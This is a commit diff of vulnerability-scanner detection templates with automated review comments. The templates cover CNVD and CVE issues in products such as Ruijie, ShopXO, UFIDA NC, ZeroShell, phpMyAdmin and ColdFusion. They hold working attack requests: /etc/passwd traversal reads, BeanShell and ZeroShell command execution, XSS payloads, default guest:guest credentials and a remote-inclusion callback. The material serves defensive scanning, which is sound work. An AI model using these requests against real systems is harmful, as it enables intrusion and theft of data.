| feifeicms | 1 | | | | | | | | |
|
||||
| alibaba | 1 | | | | | | | | |
|
||||
| cve2005 | 1 | | | | | | | | |
|
||||
| webadmin | 1 | | | | | | | | |
|
||||
| totaljs | 1 | | | | | | | | |
|
||||
| myucms | 1 | | | | | | | | |
|
||||
| drone | 1 | | | | | | | | |
|
||||
| centreon | 1 | | | | | | | | |
|
||||
| dotclear | 1 | | | | | | | | |
|
||||
| postmessage | 1 | | | | | | | | |
|
||||
| opensns | 1 | | | | | | | | |
|
||||
| nsasg | 1 | | | | | | | | |
|
||||
| octobercms | 1 | | | | | | | | |
|
||||
| upnp | 1 | | | | | | | | |
|
||||
| circontrol | 1 | | | | | | | | |
|
||||
| monitorix | 1 | | | | | | | | |
|
||||
| concrete | 1 | | | | | | | | |
|
||||
| monitorr | 1 | | | | | | | | |
|
||||
| csrf | 1 | | | | | | | | |
|
||||
| pulsesecure | 1 | | | | | | | | |
|
||||
| cobub | 1 | | | | | | | | |
|
||||
| zte | 1 | | | | | | | | |
|
||||
| phpfusion | 1 | | | | | | | | |
|
||||
| plc | 1 | | | | | | | | |
|
||||
| centos | 1 | | | | | | | | |
|
||||
| opensmtpd | 1 | | | | | | | | |
|
||||
| acexy | 1 | | | | | | | | |
|
||||
| nordex | 1 | | | | | | | | |
|
||||
| wavlink | 1 | | | | | | | | |
|
||||
| servicedesk | 1 | | | | | | | | |
|
||||
| wing-ftp | 1 | | | | | | | | |
|
||||
| mobileiron | 1 | | | | | | | | |
|
||||
| yachtcontrol | 1 | | | | | | | | |
|
||||
| rsyncd | 1 | | | | | | | | |
|
||||
| octoprint | 1 | | | | | | | | |
|
||||
| twitter-server | 1 | | | | | | | | |
|
||||
| zyxel | 1 | | | | | | | | |
|
||||
| sprintful | 1 | | | | | | | | |
|
||||
| mirai | 1 | | | | | | | | |
|
||||
| faraday | 1 | | | | | | | | |
|
||||
| favicon | 1 | | | | | | | | |
|
||||
| moin | 1 | | | | | | | | |
|
||||
| floc | 1 | | | | | | | | |
|
||||
| goahead | 1 | | | | | | | | |
|
||||
| st | 1 | | | | | | | | |
|
||||
| apiman | 1 | | | | | | | | |
|
||||
| comodo | 1 | | | | | | | | |
|
||||
| pippoint | 1 | | | | | | | | |
|
||||
| 2014 | 1 | | | | | | | | |
|
||||
| pyramid | 1 | | | | | | | | |
|
||||
| proftpd | 1 | | | | | | | | |
|
||||
| moinmoin | 1 | | | | | | | | |
|
||||
| jnoj | 1 | | | | | | | | |
|
||||
| firebase | 1 | | | | | | | | |
|
||||
| emc | 1 | | | | | | | | |
|
||||
| shopware | 1 | | | | | | | | |
|
||||
| klog | 1 | | | | | | | | |
|
||||
| avtech | 1 | | | | | | | | |
|
|
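Review bot: several rows in this tag table look like misspellings or near-duplicates of other rows, which splits templates that should be selected together under one tag: `circontrorl` next to `circontrol`, `rujjie` next to `ruijie`, `fortigates` next to `fortigate`, `k8` and `k8s` next to `kubernetes`, plus `woocomernce`, `openrestry`, `rockethchat` and `jenkin`. If the table is generated from the templates' `tags:` fields, correct the tags in the templates and regenerate it rather than editing the rows by hand. The bare `2014` tag also looks unintended.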
@ -0,0 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 547 | dhiyaneshdk | 232 | cves | 554 | info | 569 | http | 1646 |
|
||||
| panel | 213 | pikpikcu | 225 | vulnerabilities | 252 | high | 441 | file | 44 |
|
||||
| xss | 202 | pdteam | 189 | exposed-panels | 215 | medium | 371 | network | 35 |
|
||||
| wordpress | 189 | dwisiswant0 | 126 | exposures | 170 | critical | 210 | dns | 11 |
|
||||
| rce | 181 | geeknik | 122 | technologies | 156 | low | 150 | | |
|
||||
| exposure | 180 | daffainfo | 114 | misconfiguration | 119 | | | | |
|
||||
| lfi | 155 | madrobot | 60 | takeovers | 70 | | | | |
|
||||
| cve2020 | 153 | gy741 | 54 | default-logins | 49 | | | | |
|
||||
| wp-plugin | 127 | princechaddha | 53 | file | 44 | | | | |
|
||||
| tech | 97 | gaurang | 42 | workflows | 34 | | | | |
|
|
@ -0,0 +1,27 @@
|
|||
id: CNVD-2019-01348
|
||||
|
||||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
part: body
|
||||
condition: and
|
|
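Review bot: the matchers only confirm that `/install/` renders (status 200 plus `/view/js/xiuno.js` and the language prompt in the body), so the template reports a reachable installer page, not a reinstall that would actually proceed. If the application still serves this page on a locked installation, this is a false positive; consider matching a string that only appears when installation is permitted, or word the name and description as an exposed installer. The `Accept-Encoding: deflate` header does not appear to be needed for the match and can be dropped.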
@ -0,0 +1,26 @@
|
|||
id: CNVD-2020-23735
|
||||
|
||||
info:
|
||||
name: Xxunchi Local File read
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
part: body
|
||||
condition: and
|
|
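Review bot: the metadata names three different products: `name` says "Xxunchi", `description` says "Xunyou cms" and the tag is `xunchi`. Please settle on one spelling so the template can be found by product. The `reference` URL ends in `2025171` instead of the CNVD id used as the template `id`, so it is worth confirming it points at CNVD-2020-23735. On the matchers, the first word is the same value the request sends in `password=`, so any response that echoes the query string satisfies it; `display_errors` is the only word that shows file content was returned.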
@ -0,0 +1,30 @@
|
|||
id: CNVD-2020-56167
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
tags: ruijie,default-login,cnvd
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
|
||||
headers:
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
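Review bot: there is no `description` in the `info` block, and the credential being tested is only visible as the base64 `Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=` value, which decodes to `guest:guest`. Add a description that states the default account so a finding can be acted on without decoding the header. In the word matcher, `/WEB_VMS/LEVEL15/` is the request path itself, so it adds little; `Level was: LEVEL15` is the string that carries the detection.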
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi
|
||||
tags: lfi,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
@ -1,11 +1,11 @@
|
|||
id: weiphp-path-traversal
|
||||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 Path Traversal
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
tags: weiphp,lfi
|
||||
tags: weiphp,lfi,cnvd
|
||||
|
||||
requests:
|
||||
- raw:
|
|
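Review bot: changing `id` from `weiphp-path-traversal` to `CNVD-2020-68596` breaks anything that refers to the old id, such as workflows, exclusion lists or stored results keyed on template id. If the rename is intended, call it out in the commit or release notes. The `reference` is a plain `http://` wiki link; add the CNVD entry itself if one is available.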
@ -1,11 +1,11 @@
|
|||
id: eea-disclosure
|
||||
id: CNVD-2021-10543
|
||||
|
||||
info:
|
||||
name: EEA Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
tags: config,exposure
|
||||
tags: config,exposure,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
|
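Review bot: after this change the tags are `config,exposure,cnvd`, which still carries no product tag, while the other CNVD templates in this commit have one (`xiuno`, `weiphp`, `ruijie`, `shopxo`). Adding a product tag would let users select or exclude this check by product. The `id` rename from `eea-disclosure` also affects anyone referencing the old id.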
@ -0,0 +1,27 @@
|
|||
id: CNVD-2021-15822
|
||||
|
||||
info:
|
||||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
tags: shopxo,lfi
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
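Review bot: `tags: shopxo,lfi` is missing the `cnvd` tag that this commit adds to every other CNVD-numbered template, so a run filtered on `cnvd` will skip it. There is also no `description`; a line explaining that the `url` path segment `L2V0Yy9wYXNzd2Q=` is base64 for `/etc/passwd` would make the request readable. The `Content-Type: application/x-www-form-urlencoded` header on a body-less GET can be removed.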
@ -0,0 +1,29 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
tags: ruijie,disclosure,cnvd
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
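Review bot: the request is not anonymous: it sends `Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest`, and the `auth` value decodes to `guest:guest`. The `info` block has no `description`, so a reader cannot tell that the finding means "a guest session can read `webuser-auth.xml`". Please add one. The word matcher checks only that `<userauth>` and `<password>` tags are present; a header matcher on an XML content type would cut matches on HTML pages that happen to contain those strings.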
@ -0,0 +1,45 @@
|
|||
id: CNVD-2021-30167
|
||||
|
||||
info:
|
||||
name: UFIDA NC BeanShell Remote Code Execution
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: |
|
||||
- https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A
|
||||
- https://www.cnvd.org.cn/webinfo/show/6491
|
||||
tags: beanshell,rce,cnvd
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- | #linux
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("id");
|
||||
|
||||
- | #windows
|
||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("ipconfig");
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid="
|
||||
- "Windows IP"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "BeanShell Test Servlet"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
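Review bot: the regex `uid=` is loose for a check that reports code execution; any body containing that substring passes once `BeanShell Test Servlet` is present. Match the shape of `id` output instead, for example `uid=\d+\(` together with `gid=`, and keep `Windows IP` for the second request. Severity is `high` here while the Struts2 RCE template touched in this same commit is `critical`; align them or explain the difference. Since both requests run a command on the target, consider tagging the template `intrusive`, a tag already in use in this repository.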
@ -4,6 +4,10 @@ info:
|
|||
author: CasperGN
|
||||
severity: medium
|
||||
tags: cve,cve2005
|
||||
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
|
||||
reference: |
|
||||
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
|
||||
- https://www.exploit-db.com/exploits/39495
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
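Review bot: `reference: |` opens a literal block, so the two `- http...` lines that follow are read as one multi-line string with leading dashes, not as a list. The new CVE-2005-4385 and CVE-2006-1681 templates in this commit use a plain `reference:` followed by list items; use the same form here so tooling that reads references sees two URLs. The tags remain `cve,cve2005` with no product tag for Lotus Domino.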
@ -0,0 +1,26 @@
|
|||
id: CVE-2005-4385
|
||||
|
||||
info:
|
||||
name: Cofax <= 2.0RC3 XSS
|
||||
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
|
||||
reference:
|
||||
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cofax,xss,cve,cve2005
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "'>\"</script><script>alert(document.domain)</script>"
|
|
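Review bot: the matchers check only status 200 and that the payload string appears in the body, with no check on the response content type. A payload reflected in JSON or plain text will match without being rendered as script. The CVE-2006-1681 and CVE-2007-0885 templates in this commit add a `part: header` word matcher for `text/html`; add the same here.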
@ -0,0 +1,30 @@
|
|||
id: CVE-2006-1681
|
||||
|
||||
info:
|
||||
name: Cherokee HTTPD <=0.5 XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
|
||||
reference:
|
||||
- https://www.securityfocus.com/bid/17408
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cherokee,httpd,xss,cve,cve2006
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
|
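Review bot: the `status` matcher requires 200, but the description says the script is injected into the page generated for an HTTP 400 error, so with `matchers-condition: and` a vulnerable server answering 400 would not match. Consider matching `400`, or dropping the status matcher and relying on the body and `text/html` checks. The first word matcher also has no explicit `part: body`, unlike the header matcher below it.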
@ -0,0 +1,29 @@
|
|||
id: CVE-2007-0885
|
||||
|
||||
info:
|
||||
name: Rainbow.Zen Jira XSS
|
||||
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
|
||||
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
|
||||
author: geeknik
|
||||
severity: medium
|
||||
tags: cve,cve2007,jira,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "\"><script>alert('{{randstr}}')</script>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Apache Struts2 S2-001 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference: https://www.guildhab.top/?p=2326
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
|
@ -21,7 +22,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
|
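Review bot: replacing `root:[x*]:0:0` with `root:.*:0:0` in the regex matcher loosens the check more than needed, because `.*` is greedy and accepts any text between `root:` and `:0:0` on a line, not just a password field. `root:[^:]*:0:0:` would still accept a hash or an empty password field while staying tied to the passwd layout, and its trailing colon matches the form used in the CMSimple hunk of this commit.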
@ -4,6 +4,8 @@ info:
|
|||
name: AppServ Open Project 2.5.10 and earlier XSS
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
|
|
|
@ -3,6 +3,8 @@ info:
|
|||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference: https://www.exploit-db.com/exploits/5700
|
||||
tags: cve,cve2008,lfi
|
||||
requests:
|
||||
|
@ -19,5 +21,5 @@ requests:
|
|||
- 200
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <= 0.2.7 Directory Traversal
|
||||
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: nweb2fax,lfi,cve,cve2008
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference: https://www.exploit-db.com/exploits/8023
|
||||
severity: critical
|
||||
tags: cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
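Review bot: the `matchers` block is a single body regex with no `status` matcher and no `matchers-condition`, unlike the other /etc/passwd checks added in this commit, and the template is rated `critical`. Adding `status: 200` under `matchers-condition: and` would make the finding harder to trigger by accident on a page that merely contains a passwd-like string.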
@ -0,0 +1,28 @@
|
|||
id: CVE-2009-0932
|
||||
|
||||
info:
|
||||
name: Horde - Horde_Image::factory driver Argument LFI
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: |
|
||||
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
tags: cve,cve2009,horde,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
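Review bot: `reference: |` followed by `- https://...` lines is a YAML literal block scalar, so the field parses as one multi-line string rather than a list, while CVE-2005-4385 in this commit uses a plain `reference:` key with list items. Pick one form for the whole change set. The NVD link can also lose its `?cpeVersion=2.2` query string.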
@ -0,0 +1,35 @@
|
|||
id: CVE-2009-1151
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||
reference: https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
tags: cve,cve2009,phpmyadmin,rce,deserialization
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||
Connection: close
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 80
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
|
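Review bot: the info block and the request describe different things. The description and `reference` are for PMASA-2009-3 (PHP code written into the generated configuration file), while the `vulhub` link is WooYun-2016-199433 and the POST body sends a serialized `PMA_Config` object whose `source` is `/etc/passwd`, which is a file read confirmed by the passwd regex. Confirm which issue the `id` and the `rce` tag should refer to, or reword the description to match the check. `vulhub:` is also the only such key among the info blocks in this commit; folding the link into `reference` would match the others, and the regex matcher could state `part: body` explicitly.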
@ -0,0 +1,24 @@
|
|||
id: CVE-2009-1558
|
||||
|
||||
info:
|
||||
name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
|
||||
reference: https://www.exploit-db.com/exploits/32954
|
||||
tags: cve,cve2009,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2009-1872
|
||||
|
||||
info:
|
||||
name: Adobe Coldfusion 8 linked XSS vulnerabilies
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
|
||||
- https://www.tenable.com/cve/CVE-2009-1872
|
||||
tags: cve,cve2009,adobe,xss,coldfusion
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?></script><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
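Review bot: `name` has a typo, "vulnerabilies" should be "vulnerabilities". The description lists four affected endpoints but `path` requests only `wizards/common/_logintowizard.cfm`, so either add the others or narrow the name to that endpoint. The payload in the path is also sent raw rather than percent-encoded as in most of the other XSS templates in this commit.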
@ -0,0 +1,26 @@
|
|||
id: CVE-2009-4223
|
||||
|
||||
info:
|
||||
name: KR-Web <= 1.1b2 RFI
|
||||
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/krw/
|
||||
- https://www.exploit-db.com/exploits/10216
|
||||
author: geeknik
|
||||
severity: high
|
||||
tags: cve,cve2009,krweb,rfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
|
